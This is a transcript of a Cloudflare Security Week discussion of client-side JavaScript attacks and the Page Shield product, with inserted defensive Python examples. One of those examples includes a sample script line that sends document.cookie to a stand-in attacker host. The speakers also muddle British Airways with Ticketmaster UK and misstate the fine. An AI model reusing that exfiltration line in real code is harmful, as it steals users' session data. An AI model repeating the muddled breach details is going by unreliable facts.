🔒 Security Week Product Discussion: Client Side Protection from L3 to L7
Presented by: Patrick Donahue, Justin Zhou, David Tuber, Andres Marisca
Originally aired on March 10, 2022 @ 8:00 AM - 9:00 AM EST
Join Cloudflare's Product Management team to learn more about the products announced today during Security Week.
Read the blog posts:
- Page Shield: Protect User Data In-Browser
- Protecting Cloudflare Customers from BGP Insecurity with Route Leak Detection
Tune in daily for more Security Week at Cloudflare!
Transcript (Beta)
Alright, welcome back to Security Week. I'm your host this week, Patrick Donahue. Today is Thursday, and I'm joined by another great group of product managers and security team members.
I'm here to talk to you today about something a little bit different.
So earlier in the week, we've been talking about how you protect your employees and your data centers and offices and your locations and your infrastructure.
Today, we're talking about protecting your users. So I'm joined by a group here.
I'm going to let them introduce themselves. And so we're going to start with Justin and Andres and Tubes.
If you can tell us what your name is, what your role is and what you're focused on here at Cloudflare.
Great. Thanks, Pat. Hey, everybody.
I'm Justin. I am in product here at Cloudflare working on client-side security.
So ever since I started at Cloudflare, my focus has been sort of tackling software supply chain, you know, challenges in the client.
So helping protect your customers.
To you, Andres. Thank you, Justin. So my name is Andres.
I'm effectively working as a machine learning engineer. I'm working for the security team at Cloudflare, mainly on securing our internal systems.
I am actually working out of Lisbon as well.
And I've been collaborating with the product team on a few ideas and a few research topics that we've been quite interested in lately.
To you, Tubes. Hi, my name is Tubes. I am a product manager for network and availability.
And I'm based in Seattle, Washington. And I think you probably have the best nickname for being our network product manager.
Tubes, I mean, we couldn't have designed it in a better way.
Yeah, it's totally designed. Well, my initials are PRD.
And so, you know, everyone thinks when I'm talking about product requirements, I've got a natural name for product management, but you've got one even more tailored to network product management.
So terrific. So Justin, I want to start with you.
So let's talk about client-side security and the announcement you made today about Page Shield.
I think, you know, if I think back to building my first web page, you know, it was some very basic editor where, you know, I was opening it and writing a few, you know, HTML tags by hand.
And, you know, it was really a very static web page and didn't have any dependencies.
You know, this was, you know, in the 90s, right?
So there wasn't a whole lot of things to draw on, but that's changed, right?
Tell me about how web pages are built today and sort of what is involved in building a page today.
Yeah. So what we've seen over time is that third-party vendors have specialized harder and harder into things like analytics, marketing, tracking, customer success, payments.
And because of that, the amount of third-party JavaScript on websites has steadily increased over time.
And this has also happened as sort of, you know, you've got like different teams within large organizations shipping code and just inserting pieces of JavaScript that they need for their particular functions.
And then what you end up having is this like huge dependency graph across your application where you have often dozens or even hundreds of JavaScript files that are pulled in from external sources, not under control by you or your team.
Yeah. And so for those at home that aren't familiar with JavaScript, like what can you just tell a little bit about the language and how is it used within the browser?
Yeah. So JavaScript is essentially today the core kind of logic layer among both front-end applications and a lot of back-end services now.
So it is essentially the bread and butter of what every, you know, full-stack web developer uses nowadays.
And because of that, you know, third-party JavaScript is incredibly ubiquitous.
Right.
And so like you have, you know, going back to me in the nineties, right. If I were wanting to use, you know, early JavaScript coming out of, you know, Netscape and Marc Andreessen and crew, like being able to write some basic functionality to do something dynamic, that's evolved quite a bit.
Right. And so there's a lot of stuff today where you're making, you enter the sort of dynamic network calls, right.
Where you're able to take user input and send that somewhere, whether it's, you know, directly from the browser or submitting through a form.
We obviously have the Cloudflare Workers ecosystem and framework to run, you know, JavaScript server side.
And so it's really ubiquitous now in the web development world.
Right. And so it's great. It can let you do a lot of things and build really rich dynamic experiences, but there's some dangerous parts of it.
Right. And so there's some concern in terms of running in the browser.
Can you speak a little bit about that?
Yeah. So JavaScript files running on your application have access to network requests and access to local storage and cookies.
They have access to, you know, the DOM.
Right. And because of that, JavaScript can essentially look at anything that is happening on your application.
And this includes, you know, very sensitive information like PII, credit card numbers, login credentials.
It really has a ton of power once it gets into a customer's browser, and it is therefore also a potential attack vector.
Yeah. And so if you were tuning in earlier this week, we launched a remote browser isolation, which is a way to protect your employees.
Right. And so if that JavaScript is running locally on your machine and it's compromised, as Andres can get into depth here, there's a lot of concern where, you know, accessing local data and exfiltrating it and compromising the machine itself.
But today we're focused on protecting the end users. And so if you're serving JavaScript to your customers, there's risk here.
Right. I think that the most obvious example that people are familiar with, the canonical one we talk about when we talk about client side security at the application layer is Magecart.
Right. What is Magecart? And can you provide a little bit of history and context there?
Yeah. So Magecart is a threat model where hackers have decided that because you're seeing dozens and even hundreds of JavaScript dependencies that are loaded in externally on the client that, you know, at least one of them is in a poorly protected host server.
So hackers have basically scoped out websites and attacked the weakest link of your external JavaScript dependencies and then gain control over the source code that is served to your end users browsers.
And because of that, once you gain control to that source code, you can do all sorts of, you know, malicious stuff in the browser, such as stealing, you know, credit card numbers, you could be, you know, malvertising, you can be sending customers malicious domains.
So gaining control over client side JavaScript can be really devastating for your applications.
Yeah. I've known, I've gone to certain sites and I think it's, you know, a bad ad and you see the browser just sort of refreshing and going from page to page.
And then I hear my CPU, you know, I hear the fan spinning up on my computer.
Right. And so there's a broad range of things that someone's looking to do.
Right. So it sounds like you mentioned the exfiltration of sensitive data, but what are some of the other things that you see JavaScript being used for nefarious reasons?
We've seen a lot of sort of like malvertising, right?
Where advertisement pops up that you, the application owner never put on your site and customers and users would mistakenly click on that and they get taken to a phishing domain where, you know, their information might be stolen from them.
We've also seen cryptojacking where essentially once hackers gain control over JavaScript, they have that JavaScript mine cryptocurrency using your browser resources and that, you know, damages your end users' overall experience and slows everything down.
Andres, I think you wrote about one of these styles of cryptojacking attacks that's going to be in a blog post that will be published soon on the Cloudflare site.
It was a great read, went through it last night. Why do people do this?
And you mentioned something about GPUs, like what is the desire there to take advantage of that?
Well, effectively with the crypto market, as it's been booming and constantly going through that boom-bust cycle, like the price is constantly fluctuating, it's quite expensive for pretty much any normal person to be able to mine any cryptocurrency because that deteriorates your actual hardware.
You're probably overheating your components, you're utilizing a lot of electricity and to break even is quite unlikely to happen unless you're a massive enterprise.
So effectively what the bad actors are doing, they're utilizing your computer, your energy to mine cryptocurrency that's often being effectively siphoned for free on their end.
Yeah, and one of the things I was really excited about on the remote browser isolation, just to go back to earlier in the week, I was talking to Tim, who's the product manager for that offering.
And I think when we're seeing a lot of people run their browsers server side with us and doing the network vector transmission to render it efficiently client side, one of the things we can look at is that CPU utilization of sites.
And so I think if we've got millions of people using this and we've got some baselines on how much CPU could be consumed, that feels like some good information maybe from a data science perspective that you could start to look at and develop some ways to identify some outliers there I would imagine.
Yes, definitely. Like using anything from the baselines for CPU and the GPU is especially useful because of things like WebGL where it's going to be significantly harder to have tracing going on there.
So being able to just have the execution baselines, we're able to quickly identify things that would otherwise be far more complicated to do so.
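The baseline idea discussed here can be illustrated with a very small sketch. It assumes a list of historical CPU readings per page load and flags sites that sit far above that baseline using a z-score. The site names, readings, and threshold are invented for illustration and are not taken from any Cloudflare system.

```python
from statistics import mean, stdev


def cpu_outliers(baseline, observed, threshold=3.0):
    """Return sites whose CPU usage is far above the baseline (by z-score)."""
    mu = mean(baseline)
    sigma = stdev(baseline)
    if sigma == 0:
        return {}  # a flat baseline gives no scale to measure deviation against
    flagged = {}
    for site, usage in observed.items():
        z = (usage - mu) / sigma
        if z > threshold:
            flagged[site] = round(z, 2)
    return flagged


# Hypothetical CPU percentages seen while rendering ordinary pages.
baseline_cpu = [4.0, 6.0, 5.0, 7.0, 5.5, 6.5, 4.5, 5.0]

# Hypothetical readings for three sites; only one is wildly out of range.
observed_cpu = {"news.example": 6.0, "shop.example": 7.5, "miner.example": 92.0}

suspicious = cpu_outliers(baseline_cpu, observed_cpu)
print(suspicious)
```

A real system would likely keep baselines per site and per resource type (CPU and GPU separately), but the comparison step would look similar.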
Great. And Justin, talk to me a little bit about the, so just going back to some of the attacks that you've seen and that you've looked at specifically, I think one of the ones we hear a lot about is British Airways.
Can you explain what happened there and maybe some other ones that you've been focused on?
Yeah. So British Airways is one of the examples of a software supply chain attack where they had a self-hosted piece of JavaScript, Modernizr 2.6.2, that was compromised by attackers.
And this was one of the first really high-profile attacks that happened.
And for several weeks after the compromise, this newly infected Modernizr script would basically steal credit card information.
And what's really dangerous is that client-side attacks can often be even more damaging than compromising the origin because on the origin, you're not holding CVV, you're not holding expiration dates, right?
Whereas hackers get all of that in the client and they can instantly basically begin using these credit card credentials to make fraudulent purchases.
And we saw that with the customers that were affected by this attack where they saw large amounts of credit card fraud.
Got it. And what were some of the other examples you saw? I think British Airways is a common one.
And actually, what ended up happening there before we move on?
So it sounds like it went undetected for a bit of time. What ultimately happened there?
How long? And were there any repercussions there for them?
It was approximately two or three weeks response time. And then they got hit with a large fine from the Information Commissioner's Office in the UK.
This was Ticketmaster UK specifically that was compromised.
It was approximately a $200 million fine initially.
And then they're also in the process of settling a class-action lawsuit with all the customers that were affected.
And it was approximately somewhere between 400,000 and 500,000 customers that were affected by this breach.
Got it. Yeah. I think the thing for me that we think about a lot is how do we protect our users, our customers' privacy and data?
And we spend a lot of time.
We launched something in the team where we can encrypt any sort of payload that's matching a WAF managed rule in a way that nobody at Cloudflare has visibility to that data, right?
Only the customer who's provided their public key. And we wrote about that on our blog.
I think if we can extend that to our customers' customers, I think that's even better if we can give them that integrity of their data and privacy there.
What about, I guess, I think one thing we didn't get into before we move on is why are people pulling this in and how are they pulling it in?
And so I think there's one attack that Andres wrote about called, I think it was dependency confusion, which was really interesting to me.
But if you think about building a modern application today, you're not writing every last capability, right?
It's just you would never build and finish an application. And so you're going to be pulling in components that are published elsewhere on CDNs that are hosted and pulling those in and helping you kind of quickly get to market with your application, especially in a competitive space.
Andres, can you tell me a little bit about that dependency confusion attack?
That was a really interesting one that I saw you write about.
Yeah, this one's a fairly recent one.
It was published last year. And I thought it was particularly interesting because the idea was that a security researcher, Alex Birsan, actually identified that PayPal and a few other companies had some of their internal code being referenced within the code.
So for example, if you have something like an internal Cloudflare function, what he did was release to the npm registry an equivalent public package with the same name and a higher version number.
That effectively would always supersede our internal package and it would effectively be the one chosen.
With that, effectively, he was able to compromise numerous massive enterprises, including Uber, Microsoft, PayPal.
I think the particular part of that, something like that actually can happen.
And it's something that we're privacy-centric, being able to get all of that information internally.
Like for example, if you're using something like Page Shield, you will be able to track that no such event, no such function call is actually commonly used.
And this was a new dependency and something is going on. And that's the type of thing we want to be able to track and identify early before an actual real incident happens.
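The precedence problem described in this exchange can be sketched in a few lines. The example below assumes a resolver that merges a private and a public registry and takes the highest version number, and contrasts it with one that never looks at the public registry for names the private registry owns. The package names, versions, and function names are hypothetical, and this is not how any particular package manager is implemented.

```python
def parse_version(text):
    """Turn '1.4.2' into (1, 4, 2) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def naive_resolve(name, private_registry, public_registry):
    """Unsafe: pick the highest version found in either registry."""
    candidates = []
    for source, registry in (("private", private_registry), ("public", public_registry)):
        for version in registry.get(name, []):
            candidates.append((parse_version(version), source))
    return max(candidates) if candidates else None


def scoped_resolve(name, private_registry, public_registry):
    """Safer: a name owned by the private registry is never looked up publicly."""
    if name in private_registry:
        registry, source = private_registry, "private"
    else:
        registry, source = public_registry, "public"
    versions = registry.get(name, [])
    if not versions:
        return None
    return max(parse_version(v) for v in versions), source


# Hypothetical registries: an attacker has published a same-named public package.
private = {"acme-internal-utils": ["1.4.2", "1.5.0"]}
public = {"acme-internal-utils": ["99.0.0"], "left-pad": ["1.3.0"]}

print(naive_resolve("acme-internal-utils", private, public))   # attacker's package wins
print(scoped_resolve("acme-internal-utils", private, public))  # internal package wins
```

The only difference between the two functions is where the lookup is allowed to go, which is why the attack depends on the higher version number rather than on any flaw in the internal package itself.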
Yeah, that was a really interesting attack in my mind. And thanks for the context there.
I think what I found particularly interesting was that priority system where if you've got, you're pulling in some dependencies and you're able to publish something publicly versus the private repository and having a higher precedent, even if it were named the same, being able to take that over.
And then that JavaScript, as Justin talked about is very capable and what it can do.
And they were actually pinging out.
And I think the security researcher in this case was pretty scared or shocked in terms of how many big, large enterprises had that compromised JavaScript that was running and pinging out to this infrastructure.
So I want to talk about Page Shield.
So thanks for the segue there. Justin, big announcement today.
We've been tracking this space a lot, thinking about how we can come out and do something that is unique given where we sit on the Internet, between the browsers and our customers' infrastructure.
Tell me about what is Page Shield?
What did we announce today? Yeah, of course. Page Shield is Cloudflare's ambition in sort of the client-side security space, right?
Where a lot of customers have written in and say, hey, you're doing a great job protecting our origins, but we're worried about client-side, right?
We don't have any telemetry, we don't have any tooling to be able to detect or prevent these attacks from the client.
And we really want that ability for compliance reasons and also because we're really scared seeing all these big brands get hit by Magecart-style and other client-side attacks.
So this has been a top priority for some of our customers to get out and we're happy to sort of serve their needs.
And tell me about some of the initial functionality.
I know you have a big, long roadmap and we've been working together on that and excited to see you continue to partner with Andres and team about a lot of the machine learning that we're going to be doing. What is available today for customers to get started using?
Yeah, so what's available today is a feature that we call Script Monitor.
And what it does is it uses a browser technology called Content Security Policy to get telemetry around what JavaScript files your application is pulling in on the browser side.
And it alerts you as the application owner when new JavaScript dependencies appear on your site.
The idea being that this is a really interesting security event. New things are happening on your site that you aren't under control of directly.
And therefore, you should check it out and make sure that this was an expected change and not anything malicious happening on your site.
Got it. And so if we detect this, talk about how we detect this and how we let people know what's going on and sort of what does that process look like?
What are those hooks? Mm hmm. Yeah. So this goes back to sort of like our browser technology, not our browser technology, standard browser technology, content security policy.
And what that does is it allows you to send an allow list of good things to the browser.
And anything other than that is not allowed to execute.
So what we did was we sent a report-only version of Content Security Policy, which doesn't block anything from executing.
But it still gives us telemetry on what's going on via violation reports that we consume.
And because of that, once Script Monitor is turned on for your Cloudflare zone, we constantly get data points from your end users about what JavaScript files are executed by their browsers.
And we can compare against what we've historically seen and let you, the application owner, know when things are new.
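The report-only flow described here can be sketched as follows. The header name `Content-Security-Policy-Report-Only` and the `csp-report`, `blocked-uri`, and `effective-directive` report fields come from the Content Security Policy standard. The specific policy string, the `/csp-reports` endpoint, the `ScriptInventory` class, and the sample URLs are assumptions made for illustration and do not describe how Script Monitor is actually built.

```python
import json

REPORT_ENDPOINT = "/csp-reports"  # hypothetical collection endpoint


def report_only_header(endpoint=REPORT_ENDPOINT):
    """Build a report-only policy: nothing is blocked, script loads get reported."""
    return ("Content-Security-Policy-Report-Only",
            f"script-src 'none'; report-uri {endpoint}")


class ScriptInventory:
    """Remembers script URLs already seen and surfaces the ones that are new."""

    def __init__(self, known=()):
        self.known = set(known)

    def ingest(self, raw_report):
        """Return the script URL if this report reveals a new script, else None."""
        report = json.loads(raw_report).get("csp-report", {})
        directive = report.get("effective-directive") or report.get("violated-directive", "")
        url = report.get("blocked-uri", "")
        if not directive.startswith("script-src") or not url:
            return None  # not a script report, or nothing usable in it
        if url in self.known:
            return None  # already part of the historical picture
        self.known.add(url)
        return url


def sample_report(script_url):
    """Produce a violation report shaped like the ones browsers send (trimmed)."""
    return json.dumps({"csp-report": {
        "document-uri": "https://shop.example/checkout",
        "effective-directive": "script-src-elem",
        "blocked-uri": script_url,
    }})


inventory = ScriptInventory(known={"https://cdn.example/analytics.js"})
seen = [
    "https://cdn.example/analytics.js",    # historically known
    "https://stats-cdn.example/track.js",  # new: worth an alert
    "https://stats-cdn.example/track.js",  # repeat: no second alert
]
alerts = [inventory.ingest(sample_report(url)) for url in seen]
print(report_only_header())
print(alerts)
```

Because the policy is report-only, a stale or overly strict policy costs nothing in site reliability; it only changes how many reports arrive.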
And so I know we've had a number of conversations with customers that are looking to adopt and deploy this and are in various stages of that and sort of a preview early access mode.
But what are you know, how are they thinking about the alerting versus the blocking?
I know, you know, they've looked at some other solutions that try to use CSP for blocking and there's some challenges with that approach, right?
Yeah, I think the challenges in content security policy are pretty well documented here because it's challenging to maintain a high quality allow list.
We actually explored that internally for a while and then decided that basically, you know, if a customer deploys new code without proactively updating their allow list, then they will break the site and that specific site functionality for their users until they're able to update the allow list.
And we thought that, you know, there are a lot of merits to a positive security model, but we as Cloudflare can do better given, you know, our place as, you know, a reverse proxy, right?
So we actually want to do a negative security model blocking for our customers and that way, you know, remove the reliability concern of going with CSP, vanilla CSP allow lists and really have easy setup, easy maintenance for our customers.
Yeah, and I think in hearing conversations with some of the partners we're talking to, some of the e-commerce platforms and e-commerce sites, what it seems like we're hearing is they want to get notified, you know, the second we see something potentially malicious and we'll get to the malicious detection part in one sec.
But I think we heard one say, you know, I want my pager to go off.
Another one to say, I want to be, you know, called immediately when that happens.
And so you've been integrating with the Cloudflare notification system, right?
The one that we use for other products. Exactly.
Customers in the Script Monitor dashboard are able to set up either an email or PagerDuty alert around, you know, differing security thresholds based on what's important for them to see.
Cool. And so, you know, let's go beyond the new script detection and some of the, you know, the new domain scripts running on new domains.
I do think there's some really interesting angles there as we talk to the Teams group and our threat intelligence group, you know, on earlier in the week.
And I know we're excited to leverage a lot of the data that they are tracking on domains.
And I think there's a lot of synergies there between the data sources and the offerings that we're looking at here.
In particular, you know, remote browser isolation and gateway and things like that.
But let's talk a little bit about the change detection and whether or not that change looks, you know, innocuous or something that, you know, our customers may want to drill in a little bit on.
And so, let's get into that a little bit and we'll bring Andres in to help me understand that better.
Yeah. So, as an initial context, what we want to do immediately after Script Monitor, which is, you know, available for closed beta customers today, is actually begin looking at the JavaScript files themselves, right?
So, telling customers that new JavaScript files are executing is an important first step.
But we can do better here as well, right? And so, what we want to do and what we're actively building right now is fetching JavaScript dependencies over time and versioning them.
And that way, when the code behavior changes, then we can alert customers that, hey, you put this piece of JavaScript on your site a while back.
Today, it changed and it's now doing something new. You should take a look and make sure that this new functionality is something you expect.
And this is because, you know, sort of the core kind of challenge with Magecart is that you're taking a JavaScript file from a trusted vendor and changing it to a malicious state, right?
And there's a point in time where that happens and we want to help customers understand that timeline and do something about it, you know, as soon as it happens.
Got it. So, we can alert when a trusted path, you know, that the contents changes.
But tell me a little bit more about what you mean by the behavior changes and what are some approaches that we've been experimenting with to figure that out?
Yeah. So, what we've been experimenting with is essentially what defines the same JavaScript file, right?
And it's actually a more challenging question once you dive into it because what we find is that you often have the same file, but it's maybe trivially different for all your end users.
Maybe there's like a UUID as a string token.
Maybe there's, you know, a geographic location or a timestamp.
But essentially what that means is doing a basic string comparison or a basic hash comparison doesn't work in a ton of cases, which is one of the key reasons why, you know, Subresource Integrity works in very specific use cases, but not as a general use case to protect against, you know, Magecart.
And so, what we want to do is come up with a code versioning system that is resilient to these kinds of trivial things, right?
And what we settled on was a technology or a concept of the abstract syntax tree of the JavaScript itself, which is actually mapping out variable calls and method calls and how they, you know, are structured in the file.
And, you know, sort of removing the string tokens, removing the variable naming such that, you know, we're just looking at the structure of code.
And that way we can have, you know, a way less noisy way of figuring out when JavaScript goes from version A to version B.
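The contrast drawn here between hash comparison and structural comparison can be shown with a rough sketch. It does not build a real abstract syntax tree: as a stand-in, it uses a small regex tokenizer that replaces string literals, numbers, and non-keyword identifiers with placeholders and hashes what remains. The tokenizer ignores comments and regex literals, and the sample scripts and `evil.example` domain are invented, so treat it as an approximation of the idea rather than the approach described by the speakers.

```python
import hashlib
import re

# Simplified JavaScript tokenizer: strings, numbers, identifiers, punctuation.
TOKEN = re.compile(r"""
    (?P<string>"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|`(?:\\.|[^`\\])*`)
  | (?P<number>\d+(?:\.\d+)?)
  | (?P<ident>[A-Za-z_$][A-Za-z0-9_$]*)
  | (?P<punct>[^\sA-Za-z0-9_$])
""", re.VERBOSE)

KEYWORDS = {"var", "let", "const", "function", "return", "if", "else",
            "for", "while", "new", "typeof", "this"}


def structural_tokens(source):
    """Keep keywords and punctuation; blank out literals and names."""
    tokens = []
    for match in TOKEN.finditer(source):
        kind, text = match.lastgroup, match.group()
        if kind == "string":
            tokens.append("STR")
        elif kind == "number":
            tokens.append("NUM")
        elif kind == "ident" and text not in KEYWORDS:
            tokens.append("ID")
        else:
            tokens.append(text)
    return tokens


def raw_hash(source):
    """Byte-for-byte hash, the kind of comparison that trivial changes defeat."""
    return hashlib.sha256(source.encode()).hexdigest()


def fingerprint(source):
    """Hash of the structure only, ignoring literal values and naming."""
    return hashlib.sha256(" ".join(structural_tokens(source)).encode()).hexdigest()


# Two servings of the same script that differ only in a token and a timestamp.
version_a = 'var token = "3f2a-91bc"; send(token, 1646899200);'
version_b = 'var t = "77de-0a41"; send(t, 1646985600);'
# A third serving that has gained an extra network call.
version_c = version_b + ' fetch("https://evil.example/c?d=" + document.cookie);'

print(raw_hash(version_a) == raw_hash(version_b))        # byte hashes differ
print(fingerprint(version_a) == fingerprint(version_b))  # structure matches
print(fingerprint(version_a) == fingerprint(version_c))  # structure changed
```

A production version would parse the file into an actual syntax tree, which also makes it possible to describe what changed rather than only that something did.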
Yeah. And I think that's really important to reduce that noise, right?
The last thing an administrator wants is that security fatigue, right?
Where they're getting alert, alert, alert, you start tuning that out and you're not looking into it.
And so, I know that you've been, you know, working on some of these models and actually trying to benchmark our detection against some, you know, known bad malicious JavaScript.
Can you speak a little bit about, you know, how you and Andres, and maybe this is a better question for Andres, how have you been trying to identify and benchmark our efforts in this case?
I can start and I'll pass off to Andres.
And huge, you know, props to all the team members involved in doing this work.
It's really cutting edge, you know, cyber security work here. And it's great that everybody's been involved so far.
But what we've been doing is essentially taking samples of known JavaScript malware and known Magecart malware and then training models against benign JavaScript that we've seen both in the wild and, you know, what we serve over CDNJS, right?
And by training these together, we can, you know, build classifiers around what is a, you know, benign piece of JavaScript and what is a malicious piece of JavaScript.
And we've actually, you know, internally proven really, really strong accuracy.
And we're working on sort of further refining our methods moving forward.
Now, I'll pass to Andres.
Yeah, I think Andres, it would be great for the audience to hear is like, how does that actually work?
Like, everyone hears, okay, we do machine learning and training, but what does that actually mean?
That's perfect. Thank you, Justin.
Well, effectively, I think I want to make sure everyone understands that there's a constant feedback loop happening across us.
Like, I'm in the security team, they're in the product team, and we're constantly communicating and working and researching things together.
So, I think, like, one of the important elements here is that Cloudflare is reaching a very particular point where we have a convergence of technologies.
And that's what's going to make us a very strong player in this specific use case.
We have everything from being able to host a massive amount of JavaScript in CDNJS, and we have things like browser isolation, where we are able, for example, to execute and extract all the call graphs and everything there.
We're able to gather that data. So, we can go beyond, like, static analysis and the traditional methods that you would otherwise use.
And one of the things that I think is important is to explain, like, why are the things that we're doing actually useful?
By effectively labeling our data, we are able to teach our algorithm that a specific instance of, like, the abstract syntax tree and the call graph, so how our JavaScript behaves, will map to a benign or a malicious use case.
So, that way, we're able to, like, with a certain degree of accuracy and constantly updating that as new cases occur, we're able to both incrementally improve our accuracy and become better over time, whilst also attempting to detect features that might not be directly visible to us as users.
Like, we are aiming to also gather the features that would catch something before it's actually a well-known problem.
And that's one of the biggest benefits of going through machine learning methods.
And I think it's worth mentioning that we are also, like, looking into what's ahead, what comes after.
We have something like supervised learning at the moment, where we're working on labeled data and increasing our accuracy over time, effectively.
We have an active learning capability based on that.
As new things come on, we're able to label new edge cases that would otherwise have been missed, and all of a sudden, the algorithm is able to adapt.
Now, being able to gather all of this information, we have things like the abstract syntax tree.
With our browser isolation, we can get the call graph and the dependency graph.
And also, we are able to get the side effects. Things like when something calls home, when there's actually a fetch or a request where it goes, we are able to cross correlate that with actually our domain knowledge for all the domains that we host.
And I think that's where different convergence of technologies, like the graph neural networks, can become very, very strong, where we're able to effectively create embeddings.
And that's somewhere where I think it's important to mention.
An embedding is something like we convert the understanding of that call graph into a specific set of numbers, a numeric matrix.
And with that information, we are able to effectively begin tapping into far stronger algorithms that work at the scale that Cloudflare operates in.
And I think that's where the power lies.
We're able to get similarity retrieval, which, for example, in this case would mean we know this specific byte code or minified JS is going to call to a specific server.
How do you actually map that against somewhere that has a completely different minification based on the different variables that they used, or even they use some obfuscation methods?
We want to be able to cross correlate and identify when that occurs.
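To make the embedding and similarity-retrieval idea concrete, here is a deliberately simple sketch. Instead of a graph neural network, it assumes each script is summarized as counts of the browser APIs it calls, turns those counts into a fixed-length vector, and uses cosine similarity to find the closest known script. The vocabulary, counts, and script labels are all hypothetical.

```python
import math

# Hypothetical fixed vocabulary of browser APIs observed in a script's call graph.
VOCAB = ["document.cookie", "fetch", "eval", "addEventListener",
         "localStorage.getItem", "console.log"]


def embed(call_counts):
    """Map per-API call counts to a fixed-length numeric vector."""
    return [float(call_counts.get(api, 0)) for api in VOCAB]


def cosine(u, v):
    """Cosine similarity: 1.0 means the same direction, 0.0 means unrelated."""
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
    return dot / norm if norm else 0.0


def most_similar(query, corpus):
    """Return the name of the corpus entry closest to the query vector."""
    return max(corpus, key=lambda name: cosine(query, corpus[name]))


# Hypothetical labeled corpus of previously analyzed scripts.
corpus = {
    "known_skimmer": embed({"document.cookie": 2, "fetch": 1, "addEventListener": 3}),
    "analytics_lib": embed({"console.log": 4, "localStorage.getItem": 2, "fetch": 1}),
}

# A differently minified variant: names changed, but the behaviour is much the same.
unknown = embed({"document.cookie": 2, "fetch": 1, "addEventListener": 4})

print(most_similar(unknown, corpus))
print(round(cosine(unknown, corpus["known_skimmer"]), 3))
```

Because the vector is built from behaviour rather than source text, renaming variables or changing the minifier leaves it largely unchanged, which is the property the retrieval step relies on.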
And I think that's why the breadth of data that Cloudflare hosts is quite powerful.
Yeah, I can imagine being a data scientist is probably a pretty fun place to work.
The sheer breadth of data across both the forward proxy and the reverse proxy use cases, all the different products, I think, coming together and a lot of that threat intelligence that we're surfacing ourselves and being able to put back into the product.
So hopefully you're having some fun working on some of these data sets.
One of the things that I want to get to too in a second to talk about the client side attacks on the networking side.
But Justin, just to wrap up with you, what are some of the areas, if you're in particular industries, are there industries that are often faced by these threats?
And where's a lot of the interest coming from in some of your early conversations?
Yeah, we've seen most of the interest coming in from our e-commerce customers, where essentially they've seen all these attacks where this JavaScript is executing in their checkout flow.
And we've actually also seen customers that have explicitly decided not to put any external JavaScript on their checkout flows because they're worried about this threat model.
And so we also see some financial services and other companies as well writing in and asking about this.
But essentially any application where there is critical customer information is fair game for this kind of attack.
Yeah, I think that's how I think about it, is if you've got a site that somebody's entering sensitive information that you wouldn't otherwise post publicly on the Internet, that's probably something where you want to make sure that your browser is not talking to some site.
I think one of them we saw recently, Andres, was something something stats.com.
It was like a legitimate domain and they appended stats.com into the JavaScript to send it there, to make it kind of fly under the radar if someone was reviewing that code and saying, oh, this is maybe something that is innocuous.
And I know that we're looking at, and especially on the gateway side, one of the most common threats you're seeing is domains that are newly created, right?
And so we can use a lot of that intelligence to say, is all of a sudden your user's browser trying to send stuff to a domain that was registered in the last 30 days, for example?
That seems like a pretty strong signal that we've seen.
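The newly registered domain signal mentioned here is easy to sketch. The example assumes a lookup table from hostname to registration date is already available; in practice that data would come from a registration or threat intelligence feed and would be keyed by registrable domain rather than full hostname. All hostnames, dates, and function names are invented.

```python
from datetime import date, timedelta
from urllib.parse import urlsplit


def is_newly_registered(registered_on, today, max_age_days=30):
    """True when the domain was registered within the last max_age_days."""
    return timedelta(0) <= today - registered_on <= timedelta(days=max_age_days)


def flag_destinations(urls, registration_dates, today, max_age_days=30):
    """Return hosts the browser is sending data to that were registered recently."""
    flagged = []
    for url in urls:
        host = urlsplit(url).hostname
        registered = registration_dates.get(host)
        if registered is not None and is_newly_registered(registered, today, max_age_days):
            flagged.append(host)
    return flagged


# Hypothetical registration data and outbound requests seen from a checkout page.
registration_dates = {
    "cdn.example": date(2015, 6, 1),
    "examplestats.example": date(2022, 2, 25),
}
outbound = [
    "https://cdn.example/lib.js",
    "https://examplestats.example/collect?d=abc",
]

flagged_hosts = flag_destinations(outbound, registration_dates, today=date(2022, 3, 10))
print(flagged_hosts)
```

Hosts with no registration data are skipped here; a stricter policy could treat unknown age as suspicious instead.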
So what about sending that data back through Cloudflare, Justin?
I know you've been thinking through that a bit. You hear about client-side WAF, for example, and you hear about technologies like that.
What are your thoughts around that as a potential path in the future? I think the client is sort of the final frontier in terms of building really great security posture.
We have this sort of model around the Internet right now where the requests that are going to your origin, if you're a Cloudflare customer, flow through Cloudflare, and it flows through our WAF, and we're able to sort of detect and stop attacks in real time.
But then there are all these other Internet web requests that are going to unknown host origins.
They're pulling assets, they're sending data outward, and it's actually really hard to get telemetry into what data is going where.
And we want to basically, moving forward, help customers gain a better and better understanding of what's going on there, and help them lock down their client from the security posture and really have great telemetry.
Terrific. That's really exciting.
I'm going to start running this on my single-page website, though there's not a whole lot of sensitive information going through it.
Excited to start to deploy some of those products.
And if people are interested and they want to get started using this and having discussions with you, how do they get in touch?
Yeah. So, on the blog post and on the landing page for Page Shield, there is a form that you can fill out, and essentially that will be routed to us so that you can join the wait list for the closed beta.
And then we will be popping folks off the wait list and then hopefully very soon releasing to the general public after we finish the beta.
That sounds great. And I think one of the things that's really fun about building product here, especially in the early stages of a new offering, is getting that customer input and having an opportunity to shape the direction.
I know that you and I have been having conversations with some really strategic customers over the last couple of weeks, and the input that they've given has been super valuable, I think you would say, in terms of roadmap and direction.
Exactly. Yeah. We build product basically by listening to our customers here at Cloudflare, and I think that has been really meaningful in the Page Shield case.
Terrific. All right, Mr. Tubes, I want to start talking about the network side.
So, Page Shield, of course, will help customers lock down their web applications and JavaScript.
Talk to me about the threats on the network side.
So, if we're going to deal with traffic that's flowing out at layer seven, obviously, if you step down the OSI model to layer three, you've got some network threats there.
But before we get into that, I want to help, similarly, provide some context for people.
And it's actually one of my favorite interview questions for somebody technical coming into Cloudflare that I'm going to ask you and put you on the spot here, and we're going to go through from a network perspective.
But how does traffic flow if I'm here in Austin and I'm typing in some website that's on Cloudflare and I hit enter, how does that traffic flow from my machine to a Cloudflare data center and a user's, I'm sorry, a customer's origin and then on back at the network level?
Can you take us through that? And then I'm going to have some questions about some of the threats along the way.
Yeah. So, I think before we kind of get in, it's useful to define some terms that will be helpful for understanding kind of different connectivity models within the network.
So, there's a concept called unicast. And unicast routing is basically when you ask an authority, I need to get to site A, what is the IP for site A?
And the authority will return back a single IP and that IP will map directly to a machine or a set of machines under a load balancer or one IP address.
